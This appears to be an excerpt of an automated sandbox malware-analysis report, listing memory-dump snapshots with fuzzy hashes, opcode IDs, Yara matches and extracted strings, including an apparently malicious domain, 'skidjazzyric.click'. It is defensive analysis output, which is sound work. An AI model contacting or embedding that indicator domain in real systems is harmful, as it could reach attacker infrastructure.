                                                                                                • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8<j?$D$4b
                                                                                                • API String ID: 0-2390459867
                                                                                                • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                • Instruction ID: ed769332befa664624dc374745053eba996a743d3493e60e9edc4349fd6af766
                                                                                                • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                • Instruction Fuzzy Hash: 0E81D8612483818BD719DF3988A137AFFD29FE6314F2C496DE4D18B282D33DC50A8B16
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: D`a&$NMNO$bX_^
                                                                                                • API String ID: 2994545307-620122162
                                                                                                • Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                                                • Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NP,?$UA
                                                                                                • API String ID: 0-2573221895
                                                                                                • Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                • Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: {wBy$?;;
                                                                                                • API String ID: 0-3800777323
                                                                                                • Opcode ID: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
                                                                                                • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                • Opcode Fuzzy Hash: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
                                                                                                • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: UXY^$skidjazzyric.click
                                                                                                • API String ID: 0-1204630608
                                                                                                • Opcode ID: d6b2f840607b65ae322a5fe3259cb4b977558cd4245cc32d8df2acef51395404
                                                                                                • Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
                                                                                                • Opcode Fuzzy Hash: d6b2f840607b65ae322a5fe3259cb4b977558cd4245cc32d8df2acef51395404
                                                                                                • Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: UXY^$skidjazzyric.click
                                                                                                • API String ID: 0-1204630608
                                                                                                • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                • Instruction ID: 8c2cd7ec4755c204c3992844e87b56420dd0772944348eef69cb1bd0f1b4edf4
                                                                                                • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                • Instruction Fuzzy Hash: 3F9123B5604B818FD3158F29C990662FFA2FF96300B19869CD4D28FB56C739E806CB95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: o~$yr
                                                                                                • API String ID: 0-1013308823
                                                                                                • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                                                • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: o~$yr
                                                                                                • API String ID: 0-1013308823
                                                                                                • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                • Instruction ID: 436976f2000d3e877cfb8008e1f7fc1e2b0599f0ab6f08aa002cbabfd19ea727
                                                                                                • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                • Instruction Fuzzy Hash: C991387694C3508BD324DF19C845A6BBBE2EFD1324F19892CE9CA4B391E7B4C905C786
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D`a&$NMNO
                                                                                                • API String ID: 0-4143563191
                                                                                                • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                • Instruction ID: 7ebc9ca69c4339712c4ce3567e0dc5e6d46bb9c4a6bca3caf6748e4288c19561
                                                                                                • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                • Instruction Fuzzy Hash: 2E8124316083059FD318DF28DC81A6BB7A2EFC6324F29C72CE5A54B391DB39990A8751
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :7$%$:7$%
                                                                                                • API String ID: 0-2391988857
                                                                                                • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                                                • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :7$%$:7$%
                                                                                                • API String ID: 0-2391988857
                                                                                                • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                • Instruction ID: c35a017b724ba4b10cb5bd6f36fcc71f080e44e576480f21bcdd69cdaf844391
                                                                                                • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                • Instruction Fuzzy Hash: E121D3701083808BD708DF79C965B6FFBE5BB82318F105A2CE1D287291DBB4C405CB82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: MO$MO
                                                                                                • API String ID: 0-3148518880
                                                                                                • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                • Instruction ID: b02ec67bcbe32838b8067a1966379299cb7d1926d0dcca3a98243c3abf4e7194
                                                                                                • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                • Instruction Fuzzy Hash: 7411AC741442819BEF148FA8DD91667BFA0EF42320F24A9D8DC866F38BC638C501CF65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7&'$$vA\
                                                                                                • API String ID: 0-2621209329
                                                                                                • Opcode ID: 6a4960e2c4cbeac596ca4eae9f8a78f72d17191a97ba87abbbd4385de96e26bd
                                                                                                • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                                                • Opcode Fuzzy Hash: 6a4960e2c4cbeac596ca4eae9f8a78f72d17191a97ba87abbbd4385de96e26bd
                                                                                                • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7&'$$vA\
                                                                                                • API String ID: 0-2621209329
                                                                                                • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                • Instruction ID: 356b15141cc30f69f59d7468da1d1ca38b2f188a980f23281072b477af5730a9
                                                                                                • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                • Instruction Fuzzy Hash: 69F068345145944BDB918F3C98996BE67F0E753314F202BB5C65AE32A2C635C8918F08
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00777E61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID:
                                                                                                • API String ID: 237503144-0
                                                                                                • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                • Instruction ID: ffe0d7cb372943e96c14cf72147d8e878b7b08d0f4781bbec5f7504077296485
                                                                                                • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                • Instruction Fuzzy Hash: 7DB10372A087218BC718CF28C4916AAB7E2FFD9354F19D62CE4C95B264E7389D02C795
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :;
                                                                                                • API String ID: 0-3581617570
                                                                                                • Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                                                • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                                                • Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                                                • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :;
                                                                                                • API String ID: 0-3581617570
                                                                                                • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                • Instruction ID: 4de807a7ac9e245937cf2bfbdbdec20dc13771d177b519f8589a4a1c356cc325
                                                                                                • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                • Instruction Fuzzy Hash: AAA1F471A44310ABDB10AF24CC8276BB3E1EF91325F18852CF8959B292E77DED46C752
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NP,?
                                                                                                • API String ID: 0-3110377521
                                                                                                • Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                                                • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                                                • Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                                                • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NP,?
                                                                                                • API String ID: 0-3110377521
                                                                                                • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                • Instruction ID: 4c6d91bcbd4c5f608bdaa504a76f560424a6920df507d64590d1af2124f20c1b
                                                                                                • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                • Instruction Fuzzy Hash: BEA13971B043109BDF25CF28E8D2B3BB7A6EBC5724F18862CE59857291D738AC018795
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ''
                                                                                                • API String ID: 0-694448769
                                                                                                • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                                                • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ''
                                                                                                • API String ID: 0-694448769
                                                                                                • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                • Instruction ID: 51c15e144b3720df4afaf6b0a6ca39e26de5cc991a337a94fdff7fa630529ba1
                                                                                                • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                • Instruction Fuzzy Hash: 7F9125B16183108BC7148F28C89166BB7F2EFD53A4F18D92CE8D98B791E778D905C792
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *+
                                                                                                • API String ID: 0-2181965719
                                                                                                • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                                                • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: _\]R
                                                                                                • API String ID: 2994545307-1576797437
                                                                                                • Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                                                • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                                                • Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                                                • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _\]R
                                                                                                • API String ID: 0-1576797437
                                                                                                • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                • Instruction ID: 64f9426f067214c2bef8fd904ec466ed135ab9ca3fac78e46d6ff54f6ae4b760
                                                                                                • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                • Instruction Fuzzy Hash: A49128715083519BCB18DF2CC850A6FB7E2EFDA714F19862CE4C597292E735A902C786
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: =^"\
                                                                                                • API String ID: 0-2152245029
                                                                                                • Opcode ID: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                                                • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                                                • Opcode Fuzzy Hash: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                                                • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "
                                                                                                • API String ID: 0-123907689
                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "
                                                                                                • API String ID: 0-123907689
                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                • Instruction ID: 516d87c683726bcf1da194bce1dfbae4c8addfe9edb6c69d8a322c5302a5df94
                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                • Instruction Fuzzy Hash: 7D71F472B483559BD734EE28D88031EBBE2ABC5720F29C56EE4949B3D1D278DC44C792
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _;=8
                                                                                                • API String ID: 0-3640539833
                                                                                                • Opcode ID: 7200ebf59e989a6f1d8067c4148dd48b0edab9a27d0651c4b019044e4879a279
                                                                                                • Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
                                                                                                • Opcode Fuzzy Hash: 7200ebf59e989a6f1d8067c4148dd48b0edab9a27d0651c4b019044e4879a279
                                                                                                • Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _;=8
                                                                                                • API String ID: 0-3640539833
                                                                                                • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                • Instruction ID: c08628f95f5bb1547254f9f3e0cff1e7fb5e981f642ac9a59a175a0171f81dee
                                                                                                • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                • Instruction Fuzzy Hash: F75112B0511B409BDB389F25C8616B7BBF1FF92385B048E5CC4C38BA45E739A909CB61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *+
                                                                                                • API String ID: 0-2181965719
                                                                                                • Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                                                • Instruction ID: b95df3728e9bf64b09f1214f2ff63ee594a03631e8fa95e97bc9ba91789880e6
                                                                                                • Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
